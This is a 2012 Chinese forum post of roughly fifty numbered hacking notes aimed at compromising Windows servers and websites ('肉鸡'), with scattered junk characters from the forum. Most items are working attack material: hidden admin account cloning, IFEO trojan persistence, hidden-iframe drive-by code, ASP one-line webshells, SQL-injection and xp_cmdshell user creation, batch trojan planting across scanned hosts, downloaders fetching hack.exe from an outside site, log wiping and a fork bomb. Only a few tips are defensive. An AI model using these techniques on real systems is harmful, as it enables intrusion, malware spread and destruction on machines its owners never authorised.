找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2357|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
* e$ F/ Z& w1 z5 G8 H' o$ ?( Scacls C:\windows\system32 /G hqw20:R+ l: E! t8 s- v7 ^4 D" `
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
' Y$ \9 b+ ~% K# ~6 |8 P恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F; w* W3 y9 N2 p1 P& G5 M  Y

. q8 y# k+ F3 D8 z" z+ X' h2 z2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。8 G/ v1 |8 w, B- u
5 }, _& t2 d% Z, M$ \. |, q
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
  x2 F/ w' I7 T/ e( [" n2 }0 I. a9 \- E  \" Z5 X
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号3 Z3 s9 h8 V) K# Y* `& S
6 s1 J: p1 J7 ~; I$ g
5、利用INF文件来修改注册表
1 j  v/ Z6 u: O1 Y' {/ z4 V[Version]
1 K/ W% d7 H. R/ I1 e! d! ?Signature="$CHICAGO$"
; X) v' [# `2 E! b% D[Defaultinstall]
2 z: s+ S" x, d. m, }$ ]* e( baddREG=Ating8 A9 U, n0 S9 n  w6 u( Q
[Ating]
8 m* Q7 G) m( ~! e9 f- CHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"5 W$ D: c: `: s) {9 h# p
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:# c' w& q, J, @- e' u9 H  H7 b
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
; _# k* _" A3 h/ `& u" F其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU) D7 L# q' d: f8 a. G0 [! `
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
) [, H- p# _: {7 }2 u; [HKEY_CURRENT_CONFIG 简写为 HKCC
- t* L4 v! \4 Z& J: S0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
1 q/ X/ F) j' V0 }( k) l"1"这里代表是写入或删除注册表键值中的具体数据
# g7 I. O9 e5 g5 B+ x& G* ^2 H
2 |! W$ I3 G2 S' s! }/ t6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
" @0 s( Z# {* D& U+ E5 y3 q: D多了一步就是在防火墙里添加个端口,然后导出其键值$ ?  h  ]7 Z! P! d9 z
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
1 W, a+ V3 i5 Z4 }  ^4 y
$ ^1 s3 \6 U: D5 L3 _* ^7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽; F0 H+ x$ a; b% j
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
: l6 U' ~. o; y! w0 ?3 G) t' H
1 ~3 ]0 L! _% w8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
% z! y& K6 z$ ^& w  ~  N
7 u' ]) t, J: C% _3 [) I9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
, X  U/ l9 o( V. |可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。+ c! a8 l6 w6 |. y7 _, X8 y- b
/ v' E% }  T4 A
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
% n4 S* T; |8 {3 y* t0 f8 X" |7 u' f! Y6 F3 l# L6 \' |
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
0 d( k9 H+ t7 M2 n. f* U  E5 Q& W用法:xsniff –pass –hide –log pass.txt2 F. u+ L9 ^# m7 ^! U6 O

3 L& g$ Z4 B$ b# k( @2 f12、google搜索的艺术; y9 [1 r; h% h4 }
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
: C5 y3 G) R1 w1 F或“字符串的语法错误”可以找到很多sql注入漏洞。% Z8 W6 A. m5 X) p6 Y0 w' G7 J4 {
2 }. n) v( _" g
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。, q* o% u! ]6 Q- I2 K  A' K* G

* a+ ?4 e  h# d# Y14、cmd中输入 nc –vv –l –p 1987# y8 h) C' S: _4 D
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃8 @3 ]! U& j1 V; O# @% [

+ E8 l! L  u  `1 a4 p0 _  ]15、制作T++木马,先写个ating.hta文件,内容为
9 `) Q( v+ f9 n; ]<script language="VBScript">* N: @, `+ t* u' o
set wshshell=createobject ("wscript.shell" )
8 K# @" R* X, u- X0 |a=wshshell.run("你马的名称",1)
$ y  q7 z( Z3 Twindow.close, Q: J: O) J. y- p3 y  M6 r' E$ s. b
</script>
, R; z+ }$ Y& J# `/ D* h+ d) v1 N再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。$ o4 W' D! I5 d3 C- m
( ?+ R7 W- w/ G- W1 w- n1 J
16、搜索栏里输入
# Z2 P* \# ^* T  D  p% M' A5 _6 v8 C$ j关键字%'and 1=1 and '%'='
# O5 D$ `  B5 j$ E. e; Y关键字%'and 1=2 and '%'='
# M8 Z8 [3 m8 a. U3 ^比较不同处 可以作为注入的特征字符, b2 ]6 P* }5 y( N3 `

. k3 c/ C9 n! T- |3 y$ U17、挂马代码<html>
; ?  D* N4 u1 W/ q. o9 k<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>+ q0 W- m. S* N
</html>
1 n4 K+ c- U9 v- u5 T  U) e- G, q" c1 {" ^% G7 j% J) o3 n' _. g
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,5 J' _3 h1 l8 `
net localgroup administrators还是可以看出Guest是管理员来。( H# G4 O9 L7 p# _4 {
7 x  R& F9 e: i) H; k: M
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等! D1 V4 @, j. D' k
用法: 安装: instsrv.exe 服务名称 路径% S9 n9 B" N5 r3 S8 u0 }
卸载: instsrv.exe 服务名称 REMOVE
4 N' `# ?( q- j/ S% F, O8 [! F0 n& [: C" s2 n) v% a# p
- H- o$ }$ {0 i* l! [7 t# {
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
3 o% s: ]  w) i9 @不能注入时要第一时间想到%5c暴库。
% Y6 M0 g0 E# E9 L; Q  k/ P3 b) e, l
) ~  T: i9 g/ N# ^" M/ d( L7 s22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
1 y" Y& \( F& K; D( _, D6 V9 d! p* u; O; R6 |9 Y& K' [
23、缺少xp_cmdshell时. ]# ?  |) D: L
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'$ ]! m7 s2 ?' P/ I0 C3 [
假如恢复不成功,可以尝试直接加用户(针对开3389的)
' r7 u8 C4 }* f( @declare @o int
: |' [- Q* J& b# r0 l) Zexec sp_oacreate 'wscript.shell',@o out
3 v+ x3 S6 x; t' ~exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
- }; A$ Y/ s- L. S% W
& ?5 ^" p2 u0 R6 `' t" T. W24.批量种植木马.bat$ b( D9 z5 R& L( C! P& Q; W- y8 R
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中' Q& [; i8 n- y4 p0 o. N
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
" q, W) E% c! }8 i% d$ L6 `扫描地址.txt里每个主机名一行 用\\开头
6 V) L3 S  t, c6 ~, |+ w( @" d- Y, P$ z# e0 v' M
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。, z2 z/ s4 x- S

2 w; m! j( e/ [6 W8 h# i( n6 r4 l0 `: m26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名." e9 Q% ?4 A! e8 n
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.9 @  w' b$ ~6 Q& W- l' p
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马; u" Z, R3 z# o: i; R  f3 V

% L3 M/ t- M2 V: W27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP% E8 R) `4 {" `* N5 s( [6 ?
然后用#clear logg和#clear line vty *删除日志" K1 A7 \* E7 S; {- c7 d+ u

0 C* L. ^7 P" ~; t. F28、电脑坏了省去重新安装系统的方法
" f0 F4 m5 E& ?3 |4 v9 b纯dos下执行,7 c1 W( m8 v  U3 M
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config3 P0 Q* f( w6 W+ y, t3 Q
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config; p1 C1 e$ O; N) e- c$ c

) H- B( P9 `( E  u29、解决TCP/IP筛选 在注册表里有三处,分别是:
6 k5 P, j" R, a$ hHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
# D, k& y; ?  p# w1 XHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip% w* f' i1 t7 L; c/ m
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip! i4 }+ j  u+ W3 \
分别用
+ ^5 p7 l" v2 n& T( ^regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip3 s( ?3 k( R" V% m- _
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip( b6 P% _1 r; l- ]9 u) F  Z( A
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
- @0 B! B2 V. a, B0 ~2 ]命令来导出注册表项
1 F7 i/ O! B8 z" y$ H" }, K然后把三个文件里的EnableSecurityFilters"=dword:00000001,
% }$ m+ Z, I1 W- c. ~6 J( i改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用  S( U3 M! ^6 q$ v4 o: M  B
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
' [2 V' L4 m( X/ J) c' R7 ]& |& B! G+ z- J
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
: S8 H, U8 O" J! j3 I; qSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3+ b3 s" J2 _( `4 x% W
) @9 h* a. g3 Z3 k4 u5 m+ r. j
31、全手工打造开3389工具# k. p" p8 k" |) W0 x" B+ y
打开记事本,编辑内容如下:% I% z& Y4 s% @3 t3 w6 V; r( I
echo [Components] > c:\sql
+ D! _8 d# t  R9 h+ ~echo TSEnable = on >> c:\sql" G5 X) |8 |2 G$ v- K7 F
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
5 f- `, o4 f5 J编辑好后存为BAT文件,上传至肉鸡,执行$ [1 h# U  z2 f& U. \9 v
+ v' S9 }: \1 [( @9 F. x
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
- F$ U7 E+ x/ }# s7 [( \" k6 a) s& r! Q- F- `
33、让服务器重启2 O" Z  O7 {. a$ n& I# t6 t
写个bat死循环:3 i# Y* C  x5 E' v6 w- a! t$ G
@echo off
8 g6 L1 R$ g2 O* ~:loop1" l) P+ v/ k8 o: R# d
cls& S- x7 u2 w0 Z
start cmd.exe
3 j$ j. R) X7 a6 F- D5 Kgoto loop1
* H% Z" ~) {' }/ S( B' h保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启( E; C0 e- R0 Z: p, ], Y- H

) }  |0 g$ w; Y# v5 S* L34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
+ i3 a" a) l# t' w" Q7 Z@echo off
4 o/ x, x, x; H1 m7 Idate /t >c:/3389.txt. l4 W! Q3 a- |9 F9 {9 u
time /t >>c:/3389.txt: L- B) P9 v; N0 n( L# a
attrib +s +h c:/3389.bat
4 B7 I) n) X5 T- L0 w! rattrib +s +h c:/3389.txt" `" b2 Q: v6 g& X' c
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt1 o& f+ P( H, j8 X3 D5 i
并保存为3389.bat" E( H1 O& p: N: O1 O- W/ Y. t
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号" @8 f; {5 o" Q/ K4 W

* Q1 {8 d+ d& _  Y; M% G35、有时候提不了权限的话,试试这个命令,在命令行里输入:0 j$ n6 w( _; Y+ R
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
0 e: n0 N6 u" y+ k输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
& V0 [/ t' g1 d; V1 U
$ @* c, j: h3 r8 C7 \" e. m36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
( q! K8 F7 c' H! ?, m* }& |' Recho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
3 d* ^# `9 S# k& H1 ]echo 你的FTP账号 >>c:\1.bat //输入账号
1 M- A, w0 X1 ~6 u& _0 Necho 你的FTP密码 >>c:\1.bat //输入密码5 h9 c4 `, P2 P0 ~6 j$ w4 i$ B1 G- F0 S
echo bin >>c:\1.bat //登入8 K( {, k, g; B( [* K5 l
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么% H- x: ?$ f. ?% E4 N
echo bye >>c:\1.bat //退出
/ v- L& q8 I1 o* L1 D: f) d( [3 a然后执行ftp -s:c:\1.bat即可
+ @+ u: a, ]/ m) x. K4 r/ Y0 o4 q6 L  p* F& n
37、修改注册表开3389两法0 x$ S; X( F- S$ B
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表+ p  b" i, o# U6 j, O1 B3 q- h
echo Windows Registry Editor Version 5.00 >>3389.reg
4 g) g% o% T, ~echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
( _0 n, L* d  ^* Z6 t( Z$ f9 Oecho "Enabled"="0" >>3389.reg+ i: X# u9 M" W3 m* |3 f1 G( \
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows, _7 Q$ Q/ a- |2 Z/ M
NT\CurrentVersion\Winlogon] >>3389.reg
* ~# z$ b. l7 f9 `9 a  _. Hecho "ShutdownWithoutLogon"="0" >>3389.reg
* R. @* H, S- m5 secho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
+ u" `" w) D  ?8 s! V% K>>3389.reg  P) |+ y- ~2 ]: V) `$ ?# w8 E6 R
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg/ D7 b  C& I$ b6 D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]" }! D  s' P8 _% N* |% Y
>>3389.reg( X$ S; M% \( o0 R2 G
echo "TSEnabled"=dword:00000001 >>3389.reg
$ C: f) X: s1 w4 }* Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
  H  K# u8 `& w: s3 W; Wecho "Start"=dword:00000002 >>3389.reg- F" P7 D# y, u. J( F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
, `# M1 {8 K, m6 Y>>3389.reg
( ?  R: e! N" \; Gecho "Start"=dword:00000002 >>3389.reg
; i5 ?) _( {% D( Y3 t5 J2 b* G1 ?) Oecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
2 ]8 ~0 G9 _/ Y; necho "Hotkey"="1" >>3389.reg4 l$ e/ D$ N; X3 Y0 D7 M# a
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ ?* |. b% f/ SServer\Wds\rdpwd\Tds\tcp] >>3389.reg
; k- _2 X2 W, necho "PortNumber"=dword:00000D3D >>3389.reg
3 t2 C1 V: F: j- E/ X3 r. qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 p! f1 y9 ]5 P; R* |
Server\WinStations\RDP-Tcp] >>3389.reg1 u, m6 o! P7 y! Y  Y
echo "PortNumber"=dword:00000D3D >>3389.reg
0 _0 D, ]$ X1 s把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。9 u7 k* E3 t# l' P8 o2 Z1 s
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
/ V2 W& L, g# j- [! s因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效; W' t( b. }$ k# f6 F) h9 E
(2)winxp和win2003终端开启
7 \) F' N4 N: ^* q4 T/ C) S用以下ECHO代码写一个REG文件:% N. q- [6 @9 w& D5 E
echo Windows Registry Editor Version 5.00>>3389.reg
  t1 g2 [/ S' i0 x- J5 Z! p5 mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 I* `0 L% e" B. W; O
Server]>>3389.reg  \# j# [, G' ~/ L# F4 D+ _
echo "fDenyTSConnections"=dword:00000000>>3389.reg
$ w) ~% Z/ R, Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 }  M2 l( S: l, I+ u3 L/ `Server\Wds\rdpwd\Tds\tcp]>>3389.reg
6 f1 [( m/ u8 w  `+ ]echo "PortNumber"=dword:00000d3d>>3389.reg
  `) m' ^0 ^  y: [2 zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" [* ^. Q  x- A# w" R8 ~Server\WinStations\RDP-Tcp]>>3389.reg' n, ?% m9 n, [1 y
echo "PortNumber"=dword:00000d3d>>3389.reg5 k) u" J- S1 |6 g5 b4 B0 C
然后regedit /s 3389.reg del 3389.reg
3 R5 ]8 b7 D. U. e: Z# IXP下不论开终端还是改终端端口都不需重启
% C" `( d9 d% k3 s
- @. I6 S; I# L. B' n4 r! I38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
; @+ A2 x) \& p1 [用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'4 \$ ~3 v2 S( @7 X( ]; `
" b3 G. e1 P5 C6 s  ^
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!$ @4 r3 j: \7 D  M4 i: P1 r! y& o
(1)数据库文件名应复杂并要有特殊字符% S4 D8 R4 d( k* N" a; r- V" T
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
9 }! d3 A2 x+ d. `将conn.asp文档中的
: {9 ^, }3 r7 pDBPath = Server.MapPath("数据库.mdb")1 ], P+ r; A' v+ J+ x
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
  ^% Q4 g* q1 O/ Z3 s* m) V2 P7 E( z7 l1 p. g" |( f6 _7 Z7 G
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置% S: g7 `2 Q# r! E& z- g9 x! q$ M
(3)不放在WEB目录里
; r; x, |6 w7 k- ]* A) j6 Y" r3 n7 C/ J3 I( P9 M& d" O. D$ w2 ?
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
' C3 d* i& C+ C. G4 n可以写两个bat文件) K  J, ^2 R5 M/ }& j
@echo off
6 `' M4 s# U* t2 v@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
( f/ z6 p- d8 V@del c:\winnt\system32\query.exe% U/ T. X( \* D  z2 m2 p
@del %SYSTEMROOT%\system32\dllcache\query.exe
* |9 W, N# t# z# S4 W. b@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的+ B) J* c& G" @' O
& T, V  P* r% y
@echo off
+ G7 B0 @7 C/ @' r$ s, }5 ]" @& @@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
/ K3 a( x/ D2 `& \3 A6 }6 N@del c:\winnt\system32\tsadmin.exe
  U' {2 q& \9 [/ K  E3 Q1 M% a@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
! Q; I5 u! P( [; Y$ _; C6 Q4 |" |) x
41、映射对方盘符  {- b8 w; j: Y: Y! @8 J0 O$ E
telnet到他的机器上,  @1 Y; d# U) V, ?6 ]2 \
net share 查看有没有默认共享 如果没有,那么就接着运行) u& Q2 e! g4 N) Z& [; H( K
net share c$=c:& {4 C0 P$ q7 k) F- c3 \) E- `0 ]9 e4 X
net share现在有c$* _/ D& F9 O1 h  k& {' D
在自己的机器上运行
, z8 t1 w' A# C. |5 rnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
+ c0 L' s* Z6 \' d1 X
7 J3 s4 V8 n2 m) Y' n42、一些很有用的老知识
% W. y, Q7 Z/ S  u0 Ltype c:\boot.ini ( 查看系统版本 ): c- c7 u6 f5 t2 f1 T/ }/ o6 u
net start (查看已经启动的服务)
. m( Z9 X' T! {6 p4 w7 [query user ( 查看当前终端连接 )
8 ]# I- T/ H1 q, W( f3 S$ bnet user ( 查看当前用户 )
0 d1 r6 A' o% Z$ a! l. B# Qnet user 用户 密码/add ( 建立账号 )
9 [7 V% z5 h! }6 X4 Vnet localgroup administrators 用户 /add (提升某用户为管理员)
* m4 ~' o2 {# q6 p. [ipconfig -all ( 查看IP什么的 )) x! G' H8 C+ D: q# Z7 N9 J4 T, B
netstat -an ( 查看当前网络状态 )/ A: w: V# F! _/ O
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
/ ~) B- s/ i7 q9 `2 W) O克隆时Administrator对应1F4* }* J' G1 C9 i/ g7 c1 v7 E
guest对应1F5
' M$ f& Z/ S% O3 ~& otsinternetuser对应3E8
" N/ D" k5 \5 i( C. T- H, o
# j( C% j, E0 B43、如果对方没开3389,但是装了Remote Administrator Service
2 R# f& D0 X% s0 D) R* v- N! K用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
- ?4 Z( N. @% `/ x1 d. U解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
  E$ y  `' `; Y9 T. X  h2 }: H先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"9 }8 c5 Q0 c7 z

% |) h& B* C* l+ K& _44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
0 d5 c' {" d" R  T/ ~本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
7 u! u1 \; s2 {, u) @" N( d
; k; Q% B4 G# f, o9 x9 ?45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入), {, P* `2 |8 ^" b: y
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open# d1 Q8 ]8 {, A4 L4 G
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =0 X& w" S* L4 _! N. p% C5 r
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
( u" Y* c+ i9 Z7 b5 V, c1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs& i  J' q9 L* ?& l3 {
(这是完整的一句话,其中没有换行符), G6 _$ c! M7 k/ F0 X% p
然后下载:
: }2 {& @3 m$ z# U% ecscript down.vbs http://www.hack520.org/hack.exe hack.exe
/ _, ?9 P8 Z. Q& \- p9 n7 d% e$ ~/ R) F
46、一句话木马成功依赖于两个条件:! A6 H: M5 r1 w  N& E$ `$ f" W6 f8 A
1、服务端没有禁止adodb.Stream或FSO组件0 w; u( M) ^$ t8 ^! L
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
% V0 ~, ^$ n" J0 C) V* s3 o" _5 o/ @( ]
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
' \0 b% g9 o+ M; h. y;alter database utsz set RECOVERY FULL--$ K6 w5 j& f- h; Q
;create table cmd (a image)--" P: h. J/ y. P1 y
;backup log utsz to disk = 'D:\cmd' with init--
& k" @3 [1 Y, d$ d8 ~;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
: y+ F5 K. C$ U& U+ s;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
$ f1 W' e5 H3 z  h注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
# [9 P/ y; d7 |9 c* r1 ~8 @+ O, ^# d9 X" d
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
7 J: u; V# G' m* W1 _4 i& n, q( q& a! f
9 \& A; O0 _$ P6 w. r用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
0 g' T+ q) j6 o所有会话用 'all'。$ S% h( ^( `3 @, c! O0 C
-s sessionid 列出会话的信息。+ n8 ]- |, A% A# i( R4 U
-k sessionid 终止会话。! }  h  c5 ?8 b; L# ]6 r6 Q
-m sessionid 发送消息到会话。, |! A+ ~7 N. N& b* Z

1 F3 L! V: R& cconfig 配置 telnet 服务器参数。% @* `% K( U" |3 x+ ~

/ B$ i6 P. x/ ~  x6 acommon_options 为:
$ e& G3 q! z+ i  E0 _-u user 指定要使用其凭据的用户( Z; t3 ?7 e  ~" z& u( g7 ^4 H, ~
-p password 用户密码# o- c* w: B. Q+ Y. I- ?
. @' S! [2 |- D) ?, h$ b
config_options 为:
( x4 a5 q/ [$ z& F( Adom = domain 设定用户的默认域
0 A4 V/ u1 j- W: @0 wctrlakeymap = yes|no 设定 ALT 键的映射7 e0 t4 m! B) q( S
timeout = hh:mm:ss 设定空闲会话超时值
1 c6 S+ w' W+ Z# M- |+ r! v% utimeoutactive = yes|no 启用空闲会话。
/ j' v1 I0 m8 \& hmaxfail = attempts 设定断开前失败的登录企图数。  q2 g) _% h; {% ]8 t: y" _
maxconn = connections 设定最大连接数。' t. Q3 b8 \6 O6 {
port = number 设定 telnet 端口。
# a7 F$ ?8 t' I: T9 n. A5 M4 |: }sec = [+/-]NTLM [+/-]passwd
" d0 D4 \# i; q设定身份验证机构
, g  }, z/ B& T. B5 mfname = file 指定审计文件名。" j. L# T, h. z: p. d2 E, d
fsize = size 指定审计文件的最大尺寸(MB)。1 ?' q( O2 J% v$ _  [9 A
mode = console|stream 指定操作模式。
8 D& m7 Z! X8 ]5 G; H. T+ E9 _auditlocation = eventlog|file|both/ I8 T6 k+ M2 i/ s4 D
指定记录地点
3 T+ a. K" O0 \( x2 [; ?6 uaudit = [+/-]user [+/-]fail [+/-]admin1 G, L3 `0 V' D0 X
+ e5 r/ O" |6 e: X) Z
49、例如:在IE上访问:; M- z0 j. P$ |
www.hack520.org/hack.txt就会跳转到http://www.hack520.org// c/ o  m, x2 [. K
hack.txt里面的代码是:5 Q! i: h1 x, }* F. E
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">* ^; ?* K" `! G7 [4 {' p( y
把这个hack.txt发到你空间就可以了!
/ _# _+ w! f1 u& m0 [这个可以利用来做网马哦!
; m- m' H9 _8 V- k) I9 r. r
  h1 c' F6 f' r" L( E8 B50、autorun的病毒可以通过手动限制!0 Y% A" J5 b9 f3 ^3 S8 ~' _0 n( [
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!, Q" F$ v  B! [7 n1 g
2,打开盘符用右键打开!切忌双击盘符~
; j& w7 R5 ^* C' Y4 T) F6 V2 O3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!7 D$ j# K4 G. z* `8 q, u
; _9 v9 O" E1 v8 u" i6 D
51、log备份时的一句话木马:2 t' }9 c, `5 B. J, u
a).<%%25Execute(request("go"))%%25>5 p4 ^; {1 u) ]1 V
b).<%Execute(request("go"))%>
* ]" j  B  J+ h$ x- E! Bc).%><%execute request("go")%><%
